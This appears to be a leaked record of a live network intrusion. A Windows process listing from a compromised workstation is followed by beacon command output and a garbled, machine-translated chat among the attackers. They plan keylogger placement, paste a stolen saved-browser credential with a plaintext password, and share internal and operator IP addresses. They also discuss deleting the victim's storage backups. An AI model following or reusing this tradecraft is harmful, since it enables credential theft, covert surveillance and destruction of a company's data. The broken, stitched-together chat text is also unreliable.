11976 Services 0 37,732 K Unknown NT AUTHORITY\SYSTEM 1:09:12 N/A conhost.exe 11996 Services 0 3,240 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A NableReactiveManagement.e 12032 Services 0 13,264 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A conhost.exe 12060 Services 0 3,240 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 12252 Services 0 11,924 K Unknown NT AUTHORITY\SYSTEM 0:00:18 N/A svchost.exe 12472 Services 0 12,176 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:07 N/A svchost.exe 13004 Services 0 8,556 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A WmiApSrv.exe 13836 Services 0 5,316 K Unknown NT AUTHORITY\SYSTEM 1:00:29 N/A WmiPrvSE.exe 14268 Services 0 10,128 K Unknown NT AUTHORITY\LOCAL SERVICE 0:12:20 N/A dllhost.exe 14084 Services 0 5,548 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A SolarWinds.MSP.CacheServi 15348 Services 0 18,160 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:27 N/A SolarWinds.MSP.RpcServerS 15004 Services 0 17,172 K Unknown NT AUTHORITY\SYSTEM 0:00:44 N/A svchost.exe 15148 Services 0 8,064 K Unknown NT AUTHORITY\SYSTEM 0:02:13 N/A SecurityHealthService.exe 15288 Services 0 10,516 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A svchost.exe 15108 Services 0 4,684 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A ALEService.exe 9816 Services 0 407,844 K Unknown WATERWAY\blauer 70:01:27 N/A SgrmBroker.exe 9408 Services 0 7,196 K Unknown NT AUTHORITY\SYSTEM 0:01:49 N/A SolarWinds.MSP.PME.Agent. 
5876 Services 0 6,548 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A Veeam.Backup.Service.exe 2396 Services 0 247,100 K Unknown NT AUTHORITY\SYSTEM 2:05:26 N/A svchost.exe 6092 Services 0 15,396 K Unknown NT AUTHORITY\SYSTEM 0:02:16 N/A svchost.exe 12000 Services 0 7,088 K Unknown NT AUTHORITY\SYSTEM 0:00:11 N/A svchost.exe 5860 Services 0 7,572 K Unknown NT AUTHORITY\SYSTEM 0:00:21 N/A svchost.exe 12188 Services 0 7,908 K Unknown NT AUTHORITY\SYSTEM 0:00:30 N/A svchost.exe 15924 Services 0 12,608 K Unknown NT AUTHORITY\SYSTEM 0:00:17 N/A svchost.exe 16128 Services 0 13,992 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:19 N/A Veeam.Backup.BrokerServic 18892 Services 0 13,724 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A Veeam.Backup.UIServer.exe 18900 Services 0 33,232 K Unknown NT AUTHORITY\SYSTEM 0:37:33 N/A Veeam.Backup.ExternalInfr 18936 Services 0 23,292 K Unknown NT AUTHORITY\SYSTEM 0:02:09 N/A conhost.exe 18964 Services 0 3,848 K Unknown NT AUTHORITY\SYSTEM 0:00:07 N/A Veeam.Backup.WmiServer.ex 19264 Services 0 19,032 K Unknown NT AUTHORITY\SYSTEM 0:00:41 N/A conhost.exe 19168 Services 0 3,984 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A Veeam.Backup.CatalogDataS 19564 Services 0 19,716 K Unknown NT AUTHORITY\SYSTEM 0:00:23 N/A Veeam.Backup.CloudService 20072 Services 0 44,108 K Unknown NT AUTHORITY\SYSTEM 0:03:00 N/A Veeam.Backup.EnterpriseSe 20940 Services 0 33,344 K Unknown NT AUTHORITY\SYSTEM 0:04:29 N/A Veeam.Backup.Enterprise.W 23216 Services 0 11,676 K Unknown NT AUTHORITY\SYSTEM 0:00:22 N/A conhost.exe 23240 Services 0 3,868 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A Veeam.Backup.MountService 23360 Services 0 14,324 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A Veeam.Backup.Enterprise.R 23568 Services 0 26,500 K Unknown NT AUTHORITY\SYSTEM 0:00:24 N/A AgentMaint.exe 24564 Services 0 12,792 K Unknown NT AUTHORITY\SYSTEM 0:00:08 N/A svchost.exe 23004 Services 0 7,400 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A svchost.exe 15204 Services 0 6,776 K Unknown NT AUTHORITY\LOCAL 
SERVICE 0:00:02 N/A svchost.exe 24776 Services 0 4,812 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A svchost.exe 28960 Services 0 5,196 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A NableAVDBridge.exe 28952 Services 0 22,096 K Unknown NT AUTHORITY\SYSTEM 0:00:29 N/A conhost.exe 21064 Services 0 4,148 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A svchost.exe 27260 Services 0 10,112 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A svchost.exe 14916 Services 0 5,636 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A svchost.exe 36520 Services 0 5,004 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:08 N/A WmiPrvSE.exe 39552 Services 0 65,268 K Unknown NT AUTHORITY\SYSTEM 0:35:33 N/A WmiPrvSE.exe 29268 Services 0 8,568 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:17 N/A dasHost.exe 10892 Services 0 3,064 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:00 N/A svchost.exe 11904 Services 0 5,344 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A svchost.exe 15692 Services 0 7,080 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A svchost.exe 42980 Services 0 6,336 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A MAGNEFLEX.Host.Service.ex 39396 Services 0 4,424 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A OfficeClickToRun.exe 14996 Services 0 28,220 K Unknown NT AUTHORITY\SYSTEM 0:00:29 N/A AppVShNotify.exe 38144 Services 0 4,184 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A SearchIndexer.exe 5856 Services 0 69,812 K Unknown NT AUTHORITY\SYSTEM 0:15:01 N/A Agent.exe 19932 Services 0 8,836 K Unknown NT AUTHORITY\SYSTEM 0:20:34 N/A csrss.exe 12116 Console 4 16,048 K Unknown NT AUTHORITY\SYSTEM 0:09:33 N/A winlogon.exe 10220 Console 4 11,836 K Unknown NT AUTHORITY\SYSTEM 0:00:49 N/A fontdrvhost.exe 32204 Console 4 12,192 K Unknown Font Driver Host\UMFD-4 0:00:33 N/A dwm.exe 34156 Console 4 467,000 K Unknown Window Manager\DWM-4 1:41:19 N/A EPConsole.exe 29256 Console 4 1,304 K Unknown WATERWAY\blauer 0:03:53 N/A sihost.exe 17500 Console 4 27,328 K Unknown WATERWAY\blauer 0:01:51 N/A svchost.exe 15560 Console 4 23,812 K Unknown 
WATERWAY\blauer 0:01:16 N/A ipoint.exe 6732 Console 4 4,912 K Unknown WATERWAY\blauer 0:23:38 N/A taskhostw.exe 9512 Console 4 19,988 K Unknown WATERWAY\blauer 0:00:25 N/A itype.exe 24536 Console 4 436 K Unknown WATERWAY\blauer 0:03:43 N/A MKCHelper.exe 10024 Console 4 1,292 K Unknown WATERWAY\blauer 0:00:00 N/A explorer.exe 17792 Console 4 160,260 K Unknown WATERWAY\blauer 0:32:58 N/A StartMenuExperienceHost.e 40684 Console 4 39,980 K Unknown WATERWAY\blauer 0:00:17 N/A RuntimeBroker.exe 4344 Console 4 16,316 K Unknown WATERWAY\blauer 0:00:08 N/A SearchUI.exe 20344 Console 4 69,704 K Unknown WATERWAY\blauer 0:01:54 N/A RuntimeBroker.exe 38364 Console 4 37,628 K Unknown WATERWAY\blauer 0:01:00 N/A dllhost.exe 21704 Console 4 9,400 K Unknown WATERWAY\blauer 0:00:02 N/A TodoBackupService.exe 16464 Console 4 5,648 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A RuntimeBroker.exe 14764 Console 4 22,320 K Unknown WATERWAY\blauer 0:02:08 N/A ApplicationFrameHost.exe 4496 Console 4 31,404 K Unknown WATERWAY\blauer 0:00:17 N/A SecurityHealthSystray.exe 23016 Console 4 7,248 K Unknown WATERWAY\blauer 0:00:00 N/A RtkAudUService64.exe 2944 Console 4 6,488 K Unknown WATERWAY\blauer 0:00:00 N/A LogiOptions.exe 26908 Console 4 8,100 K Unknown WATERWAY\blauer 0:04:15 N/A LogiOptionsMgr.exe 25572 Console 4 22,132 K Unknown WATERWAY\blauer 0:00:29 N/A LogiOverlay.exe 41436 Console 4 38,956 K Unknown WATERWAY\blauer 0:03:44 N/A OneDrive.exe 16416 Console 4 39,248 K Unknown WATERWAY\blauer 0:01:35 N/A CCXProcess.exe 36108 Console 4 1,844 K Unknown WATERWAY\blauer 0:00:00 N/A node.exe 26644 Console 4 57,200 K Unknown WATERWAY\blauer 0:30:33 N/A conhost.exe 23400 Console 4 3,580 K Unknown WATERWAY\blauer 0:00:00 N/A AdobeIPCBroker.exe 12072 Console 4 11,780 K Unknown WATERWAY\blauer 0:28:27 N/A chrome.exe 31592 Console 4 295,264 K Unknown WATERWAY\blauer 1:50:34 N/A chrome.exe 15200 Console 4 4,880 K Unknown WATERWAY\blauer 0:00:02 N/A chrome.exe 15472 Console 4 285,180 K Unknown 
WATERWAY\blauer 0:36:05 N/A chrome.exe 34372 Console 4 73,292 K Unknown WATERWAY\blauer 0:27:11 N/A chrome.exe 27544 Console 4 11,916 K Unknown WATERWAY\blauer 0:05:17 N/A chrome.exe 27724 Console 4 51,816 K Unknown WATERWAY\blauer 0:02:59 N/A chrome.exe 22768 Console 4 57,248 K Unknown WATERWAY\blauer 0:00:39 N/A chrome.exe 28912 Console 4 188,200 K Unknown WATERWAY\blauer 0:05:32 N/A chrome.exe 23328 Console 4 20,800 K Unknown WATERWAY\blauer 0:00:10 N/A chrome.exe 4036 Console 4 9,044 K Unknown WATERWAY\blauer 0:00:16 N/A AppleMobileDeviceProcess. 41884 Console 4 7,832 K Unknown WATERWAY\blauer 0:03:21 N/A 3CXWin8Phone.exe 27692 Console 4 123,900 K Unknown WATERWAY\blauer 0:56:56 N/A BASupSrvcCnfg.exe 7556 Console 4 12,876 K Unknown WATERWAY\blauer 0:32:23 N/A acrotray.exe 16828 Console 4 4,468 K Unknown WATERWAY\blauer 0:00:01 N/A Creative Cloud.exe 24288 Console 4 55,500 K Unknown WATERWAY\blauer 0:19:36 N/A Adobe CEF Helper.exe 32184 Console 4 22,696 K Unknown WATERWAY\blauer 0:12:52 N/A Adobe Desktop Service.exe 40852 Console 4 81,052 K Unknown WATERWAY\blauer 0:34:04 N/A Adobe CEF Helper.exe 2428 Console 4 158,868 K Unknown WATERWAY\blauer 1:05:01 N/A Creative Cloud Helper.exe 22332 Console 4 19,640 K Unknown WATERWAY\blauer 0:13:17 N/A CCLibrary.exe 18324 Console 4 1,856 K Unknown WATERWAY\blauer 0:00:00 N/A node.exe 35104 Console 4 36,032 K Unknown WATERWAY\blauer 0:14:20 N/A conhost.exe 4460 Console 4 3,584 K Unknown WATERWAY\blauer 0:00:00 N/A CoreSync.exe 16208 Console 4 28,528 K Unknown WATERWAY\blauer 0:36:28 N/A ONENOTEM.EXE 37636 Console 4 1,900 K Unknown WATERWAY\blauer 0:00:00 N/A AdobeNotificationClient.e 27620 Console 4 1,012 K Unknown WATERWAY\blauer 0:00:00 N/A Adobe Installer.exe 31268 Console 4 5,620 K Unknown WATERWAY\blauer 0:00:00 N/A Adobe CEF Helper.exe 28724 Console 4 26,872 K Unknown WATERWAY\blauer 0:12:56 N/A RuntimeBroker.exe 25900 Console 4 9,472 K Unknown WATERWAY\blauer 0:00:00 N/A ShellExperienceHost.exe 23944 Console 4 56,372 
K Unknown WATERWAY\blauer 0:00:26 N/A RuntimeBroker.exe 32588 Console 4 27,900 K Unknown WATERWAY\blauer 0:00:08 N/A svchost.exe 9332 Console 4 18,424 K Unknown WATERWAY\blauer 0:00:19 N/A YourPhoneServer.exe 31332 Console 4 22,240 K Unknown WATERWAY\blauer 0:00:22 N/A SettingSyncHost.exe 39092 Console 4 10,788 K Unknown WATERWAY\blauer 0:00:01 N/A WindowsInternal.composabl 15372 Console 4 17,568 K Unknown WATERWAY\blauer 0:00:23 N/A Slack.exe 31904 Console 4 85,668 K Unknown WATERWAY\blauer 0:10:31 N/A Slack.exe 41664 Console 4 100,124 K Unknown WATERWAY\blauer 0:03:43 N/A Slack.exe 34496 Console 4 19,596 K Unknown WATERWAY\blauer 0:01:03 N/A RuntimeBroker.exe 22304 Console 4 5,232 K Unknown WATERWAY\blauer 0:00:00 N/A Slack.exe 10944 Console 4 8,624 K Unknown WATERWAY\blauer 0:00:01 N/A Slack.exe 21904 Console 4 166,092 K Unknown WATERWAY\blauer 0:33:21 N/A dllhost.exe 31708 Console 4 10,072 K Unknown WATERWAY\blauer 0:00:02 N/A Slack.exe 23036 Console 4 47,640 K Unknown WATERWAY\blauer 0:02:37 N/A Slack.exe 15912 Console 4 9,676 K Unknown WATERWAY\blauer 0:00:16 N/A Video.UI.exe 32480 Console 4 524 K Unknown WATERWAY\blauer 0:00:00 N/A RuntimeBroker.exe 7700 Console 4 6,620 K Unknown WATERWAY\blauer 0:00:00 N/A svchost.exe 36648 Console 4 25,584 K Unknown WATERWAY\blauer 0:00:38 N/A regsvr32.exe 19536 Services 0 12,424 K Unknown WATERWAY\mharper 0:00:22 N/A Calculator.exe 3432 Console 4 4,500 K Unknown WATERWAY\blauer 0:00:21 N/A adb.exe 12956 Console 4 5,676 K Unknown WATERWAY\blauer 0:00:07 N/A smartscreen.exe 27256 Console 4 24,068 K Unknown WATERWAY\blauer 0:00:11 N/A svchost.exe 44376 Console 4 6,056 K Unknown WATERWAY\blauer 0:00:00 N/A NCentralRDViewer.exe 43768 Console 4 108 K Unknown WATERWAY\blauer 0:00:00 N/A SpeechRuntime.exe 27836 Console 4 14,848 K Unknown WATERWAY\blauer 0:00:06 N/A HelpPane.exe 29828 Console 4 9,456 K Unknown WATERWAY\blauer 0:00:01 N/A CompPkgSrv.exe 45776 Console 4 4,968 K Unknown WATERWAY\blauer 0:00:00 N/A 
Microsoft.Photos.exe 4336 Console 4 7,392 K Unknown WATERWAY\blauer 0:00:56 N/A RuntimeBroker.exe 40692 Console 4 28,292 K Unknown WATERWAY\blauer 0:01:30 N/A Adobe CEF Helper.exe 30716 Console 4 12,624 K Unknown WATERWAY\blauer 0:08:06 N/A NCentralRDLdr.exe 23292 Console 4 10,436 K Unknown WATERWAY\blauer 0:00:00 N/A NCentralRRDViewer.exe 22220 Console 4 22,680 K Unknown WATERWAY\blauer 0:00:15 N/A Todo.exe 20876 Console 4 133,788 K Unknown WATERWAY\blauer 0:01:01 N/A RuntimeBroker.exe 15216 Console 4 32,128 K Unknown WATERWAY\blauer 0:00:24 N/A WmiPrvSE.exe 34888 Services 0 34,408 K Unknown NT AUTHORITY\NETWORK SERVICE 0:13:11 N/A Ssms.exe 44328 Console 4 227,644 K Unknown WATERWAY\blauer 0:18:10 N/A unsecapp.exe 30292 Console 4 13,208 K Unknown WATERWAY\blauer 0:01:29 N/A FileCoAuth.exe 20264 Console 4 12,528 K Unknown WATERWAY\blauer 0:00:02 N/A OUTLOOK.EXE 23344 Console 4 460,596 K Unknown WATERWAY\blauer 0:24:22 N/A sppsvc.exe 40540 Services 0 11,892 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:17 N/A ctfmon.exe 47224 Console 4 19,856 K Unknown WATERWAY\blauer 0:00:51 N/A PeopleExperienceHost.exe 7072 Console 4 39,376 K Unknown WATERWAY\blauer 0:00:00 N/A RuntimeBroker.exe 41112 Console 4 9,312 K Unknown WATERWAY\blauer 0:00:00 N/A SystemSettingsBroker.exe 36768 Console 4 21,924 K Unknown WATERWAY\blauer 0:00:00 N/A SystemSettings.exe 16544 Console 4 64,608 K Unknown WATERWAY\blauer 0:00:06 N/A WinSCP.exe 34652 Console 4 39,512 K Unknown WATERWAY\blauer 0:01:14 N/A Ssms.exe 50816 Console 4 169,672 K Unknown WATERWAY\blauer 0:00:57 N/A explorer.exe 53264 Console 4 80,220 K Unknown WATERWAY\blauer 0:01:07 N/A chrome.exe 37108 Console 4 154,368 K Unknown WATERWAY\blauer 0:01:33 N/A chrome.exe 46140 Console 4 107,296 K Unknown WATERWAY\blauer 0:00:29 N/A chrome.exe 43940 Console 4 35,532 K Unknown WATERWAY\blauer 0:00:00 N/A YourPhone.exe 26416 Console 4 9,788 K Unknown WATERWAY\blauer 0:00:00 N/A RuntimeBroker.exe 22076 Console 4 8,744 K Unknown WATERWAY\blauer 
0:00:00 N/A chrome.exe 19712 Console 4 66,772 K Unknown WATERWAY\blauer 0:00:13 N/A chrome.exe 39172 Console 4 49,756 K Unknown WATERWAY\blauer 0:00:03 N/A chrome.exe 30856 Console 4 61,040 K Unknown WATERWAY\blauer 0:00:07 N/A emulator.exe 20016 Console 4 7,188 K Unknown WATERWAY\blauer 0:00:00 N/A conhost.exe 54264 Console 4 5,460 K Unknown WATERWAY\blauer 0:00:00 N/A qemu-system-x86_64.exe 49880 Console 4 1,016,956 K Unknown WATERWAY\blauer 0:37:15 N/A cmd.exe 4 43928 Console 4 3,516 K Unknown WATERWAY\blauer 0:00:00 N/A emulator64-crash-service. 40780 Console 4 9,740 K Unknown WATERWAY\blauer 0:00:00 N/A audiodg.exe 42216 Services 0 16,752 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:41 N/A devenv.exe 21888 Console 4 380,748 K Unknown WATERWAY\blauer 0:04:09 N/A PerfWatson2.exe 15704 Console 4 44,628 K Unknown WATERWAY\blauer 0:00:03 N/A Microsoft.ServiceHub.Cont 2708 Console 4 44,828 K Unknown WATERWAY\blauer 0:00:01 N/A conhost.exe 55252 Console 4 5,488 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.IdentityHost.e 16320 Console 4 53,324 K Unknown WATERWAY\blauer 0:00:03 N/A conhost.exe 27172 Console 4 5,528 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.ThreadedWaitDi 55052 Console 4 45,404 K Unknown WATERWAY\blauer 0:00:01 N/A conhost.exe 28896 Console 4 5,504 K Unknown WATERWAY\blauer 0:00:00 N/A Broker.exe 53112 Console 4 35,228 K Unknown WATERWAY\blauer 0:00:54 N/A conhost.exe 50116 Console 4 5,504 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.VSDetouredHost 31776 Console 4 51,816 K Unknown WATERWAY\blauer 0:00:03 N/A conhost.exe 25996 Console 4 5,508 K Unknown WATERWAY\blauer 0:00:00 N/A IDB.Local.exe 49208 Console 4 43,628 K Unknown WATERWAY\blauer 0:00:06 N/A conhost.exe 42228 Console 4 5,512 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.RoslynCodeAnal 46356 Console 4 74,132 K Unknown WATERWAY\blauer 0:00:08 N/A conhost.exe 10928 Console 4 5,516 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.SettingsHost.e 21260 Console 4 70,072 K Unknown 
WATERWAY\blauer 0:00:08 N/A conhost.exe 23504 Console 4 5,504 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.Host.CLR.x86.e 16312 Console 4 44,724 K Unknown WATERWAY\blauer 0:00:01 N/A conhost.exe 46424 Console 4 5,524 K Unknown WATERWAY\blauer 0:00:00 N/A powershell.exe 25052 Console 4 42,496 K Unknown WATERWAY\blauer 0:00:00 N/A conhost.exe 36704 Console 4 5,568 K Unknown WATERWAY\blauer 0:00:00 N/A powershell.exe 39464 Console 4 38,496 K Unknown WATERWAY\blauer 0:00:00 N/A conhost.exe 42828 Console 4 5,548 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.Host.CLR.x86.e 22680 Console 4 32,824 K Unknown WATERWAY\blauer 0:00:01 N/A conhost.exe 52664 Console 4 5,520 K Unknown WATERWAY\blauer 0:00:00 N/A chrome.exe 19972 Console 4 52,024 K Unknown WATERWAY\blauer 0:00:01 N/A chrome.exe 41692 Console 4 32,116 K Unknown WATERWAY\blauer 0:00:00 N/A Veeam.Backup.Manager.exe 9088 Services 0 63,532 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A conhost.exe 45996 Services 0 5,508 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A devenv.exe 49028 Console 4 254,220 K Unknown WATERWAY\blauer 0:02:49 N/A PerfWatson2.exe 53460 Console 4 42,212 K Unknown WATERWAY\blauer 0:00:02 N/A Microsoft.ServiceHub.Cont 12532 Console 4 41,724 K Unknown WATERWAY\blauer 0:00:01 N/A conhost.exe 27588 Console 4 5,068 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.IdentityHost.e 37332 Console 4 51,708 K Unknown WATERWAY\blauer 0:00:03 N/A conhost.exe 22424 Console 4 5,088 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.VSDetouredHost 20684 Console 4 46,500 K Unknown WATERWAY\blauer 0:00:02 N/A conhost.exe 18008 Console 4 5,080 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.SettingsHost.e 52704 Console 4 67,064 K Unknown WATERWAY\blauer 0:00:09 N/A conhost.exe 20140 Console 4 5,100 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.Host.CLR.x86.e 38728 Console 4 38,788 K Unknown WATERWAY\blauer 0:00:01 N/A conhost.exe 21596 Console 4 5,088 K Unknown WATERWAY\blauer 0:00:00 N/A node.exe 32416 Console 4 
17,808 K Unknown WATERWAY\blauer 0:00:20 N/A node.exe 3908 Console 4 12,988 K Unknown WATERWAY\blauer 0:00:00 N/A conhost.exe 34072 Console 4 5,236 K Unknown WATERWAY\blauer 0:00:00 N/A conhost.exe 3076 Console 4 5,192 K Unknown WATERWAY\blauer 0:00:00 N/A node.exe 26828 Console 4 12,384 K Unknown WATERWAY\blauer 0:00:00 N/A ServiceHub.RoslynCodeAnal 26300 Console 4 47,016 K Unknown WATERWAY\blauer 0:00:02 N/A conhost.exe 9604 Console 4 5,088 K Unknown WATERWAY\blauer 0:00:00 N/A Zoom.exe 38420 Console 4 39,900 K Unknown WATERWAY\blauer 0:00:02 N/A chrome.exe 6204 Console 4 110,316 K Unknown WATERWAY\blauer 0:01:20 N/A chrome.exe 16424 Console 4 75,636 K Unknown WATERWAY\blauer 0:01:17 N/A chrome.exe 46452 Console 4 83,048 K Unknown WATERWAY\blauer 0:00:40 N/A Acrobat.exe 21524 Console 4 65,508 K Unknown WATERWAY\blauer 0:00:06 N/A Zoom.exe 28588 Console 4 47,484 K Unknown WATERWAY\blauer 0:00:02 N/A chrome.exe 8984 Console 4 86,464 K Unknown WATERWAY\blauer 0:00:22 N/A dllhost.exe 47920 Console 4 8,100 K Unknown WATERWAY\blauer 0:00:00 N/A chrome.exe 52124 Console 4 73,676 K Unknown WATERWAY\blauer 0:00:18 N/A chrome.exe 41936 Console 4 63,712 K Unknown WATERWAY\blauer 0:00:04 N/A chrome.exe 33212 Console 4 216,916 K Unknown WATERWAY\blauer 0:04:37 N/A chrome.exe 40412 Console 4 33,820 K Unknown WATERWAY\blauer 0:00:00 N/A chrome.exe 40984 Console 4 44,148 K Unknown WATERWAY\blauer 0:00:00 N/A chrome.exe 26948 Console 4 43,064 K Unknown WATERWAY\blauer 0:00:00 N/A chrome.exe 33364 Console 4 47,340 K Unknown WATERWAY\blauer 0:00:01 N/A chrome.exe 38164 Console 4 50,728 K Unknown WATERWAY\blauer 0:00:01 N/A chrome.exe 51816 Console 4 47,136 K Unknown WATERWAY\blauer 0:00:04 N/A chrome.exe 43836 Console 4 35,044 K Unknown WATERWAY\blauer 0:00:01 N/A chrome.exe 10436 Console 4 34,308 K Unknown WATERWAY\blauer 0:00:01 N/A chrome.exe 37792 Console 4 34,644 K Unknown WATERWAY\blauer 0:00:00 N/A chrome.exe 7472 Console 4 39,116 K Unknown WATERWAY\blauer 0:00:02 N/A 
chrome.exe 19540 Console 4 33,328 K Unknown WATERWAY\blauer 0:00:00 N/A ONENOTE.EXE 25564 Console 4 153,504 K Unknown WATERWAY\blauer 0:00:08 N/A chrome.exe 21624 Console 4 66,676 K Unknown WATERWAY\blauer 0:00:03 N/A chrome.exe 50940 Console 4 73,456 K Unknown WATERWAY\blauer 0:00:11 N/A chrome.exe 11836 Console 4 108,808 K Unknown WATERWAY\blauer 0:00:11 N/A chrome.exe 54380 Console 4 51,232 K Unknown WATERWAY\blauer 0:00:00 N/A svchost.exe 2308 Console 4 32,304 K Unknown WATERWAY\blauer 0:00:01 N/A chrome.exe 55992 Console 4 269,452 K Unknown WATERWAY\blauer 0:00:29 N/A svchost.exe 34868 Services 0 6,704 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A svchost.exe 44168 Services 0 7,028 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A chrome.exe 53128 Console 4 89,820 K Unknown WATERWAY\blauer 0:00:07 N/A chrome.exe 50200 Console 4 86,080 K Unknown WATERWAY\blauer 0:00:01 N/A chrome.exe 55936 Console 4 167,528 K Unknown WATERWAY\blauer 0:00:06 N/A TrustedInstaller.exe 55536 Services 0 7,016 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A TiWorker.exe 48204 Services 0 28,180 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A chrome.exe 23068 Console 4 22,080 K Unknown WATERWAY\blauer 0:00:00 N/A chrome.exe 42260 Console 4 41,352 K Unknown WATERWAY\blauer 0:00:00 N/A RuntimeBroker.exe 21768 Console 4 26,860 K Unknown WATERWAY\blauer 0:00:00 N/A cmd.exe 9420 Services 0 4,360 K Unknown WATERWAY\mharper 0:00:00 N/A conhost.exe 29152 Services 0 11,432 K Unknown WATERWAY\mharper 0:00:00 N/A tasklist.exe 34544 Services 0 9,940 K Unknown WATERWAY\mharper 0:00:00 N/A ``Tasked beaconed tasklist / I'll double-check from the context? I tried it ``Tasked beacon to take screenshot [+] host called home, sent: 199779 bytes [-] screenshot from desktop 0 is empty ``and give a screenshot of his desktop just every time I do it randomly, and maybe there is a best practiceson I wrote when I looked so you weighed the keylog itself? 
preferably not falling off)

and the process, any?

user context

I had a keylogger in `Rackspace`, can you find anything here about the keylogger - on which processes and under which user to hang it correctly?

i can't remember in whose work) the one in mine is in fact in another case (if you suddenly thought about mine) i saw exactly in someone's active keylogger in other cobs, have you checked?

keylogger session hangs, why then i did not put a keylogger (in the keylogger it is empty?

it has already appeared in the dialogue) i remember, if you put the keylogger? scared me, however)

i went to the Watchguard and there all is normal, all is normal as i understand it on the site and not monitor their network

"Waterway Customer Service"

sender who? just a general report came for all time-date 4-read, do not read?

I did not understand the joke about the russians in the mail, the links in the boxes met?

all collected browsers passed and nowhere is `infosight.hpe.com or hpe.com`. I did not find myself in the removed, I do not know how the colleague does not have a link in browsers?

seems not. when the client creates folders in the programdata. I did not find any

`https://store.vmware.com/,https://store.vmware.com/store/,10/7/2019 12:44:17 PM,13214943857640860,mharper@waterway.com,1Vanilla2`

`infosight.hpe.com` or `hpe.com` link above, look in browser histories

"Download the latest version of the HPE Nimble Storage Windows Toolkit (NWT) to install on your Windows host or Windows VM. Log into HPE InfoSight (https://infosight.hpe.com/). If you do not have a password, click New user? Enroll now. Click Resources > Software Downloads. In the Integration Kits pane, click Windows Toolkit. From the Windows Toolkit (NWT) page, click Software (64 bit) under Current Version. Note: For NimbleOS 3.4.0 and later, only a 64-bit package is available. Note: The Windows host must be on the same subnet as that of the array to be set up. Save the NWT installation package to your Windows host. The installation package has a name similar to Setup-NimbleNWT-x64.x.x.x.x.exe, where x64 is the supported microprocessor and x.x.x.x is the NWT version number. Download the latest HPE Nimble Storage Windows Toolkit Release Notes. Review the list of Windows Server hotfixes. Note: If you are installing HPE Nimble Storage Setup Manager alone, then no hotfixes are needed. However, the .NET framework requirements still apply. Hotfix requirements are mandatory for any Windows host in which the HPE Nimble Storage Connection Manager is used to connect to HPE Nimble Storage volumes."
https://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_Windows_Integration_Guide_NWT_5_0_0.whz/nbt1481004374959.html

t the machine is empty?

LEVASHENKO-PC: 192.168.0.22 mharper

is there a separate letter or is there a crack?

?yup then they changed the 18th year

I specially went down to find something like that, I mean when the accesses were distributed the message was ancient

did you try this message as a password? and from what date is the message?

do you have his car? and you on his mail?

does not fit the account

that is the pass to the system account? so you can work with it more quickly

do you have a topic on the forum on backups? if not, then nimble, one click and delete the whole box there?

but it's postponed, come in handy then we need nimble (yes 8 not the server?

there are only 8 computers (only 8) this correspondence about nimbly and also tried all the passwords

how many computers? and what kind of backups? also on bitdefender hitch, crazy)

give cob clean, if there. and not draw nothing...

took `Sanntech::Sanntech` There. see different ips) 209.222.97.50:10201 this is mine and I do not have another one. 206....24

about it

That's what kind of a dedic? You mean what ip)

I have long ago, you gave it and asked after configuring you to write a picture and you can roll it back. Look, even there is software which you have not put)

I have not configured access to your addy, I gave you `own`, I gave him to work with evo with an already configured vpn

likewise

no, you what confuse that squeeze me) is mine

a couple of min

@user3 you took?

not me, mine `209.222.97.50:10101`

who took my addy after # evo-com?

and i don't get it

give you a fresh build of the tool then, 20 m hahaha

second you don't have to go shashit, first these copypastes, devil's toy, go all the buttons i need to write one option) can combine)

@all i'm preparing you a guide to speed up work, you want to poke buttons in the tool or copy from the guide?

okily

let someone tell you a few posts above on updating settings for someone who came to life)

we still have 10 hours, too early) ready to go to sleep now + we will have a general discussion on process optimization next week, will be very busy, so I recommend you get some sleep this weekend

if you need more than one, this is a separate special order

1 domain one, or will there be different?

++

understood?
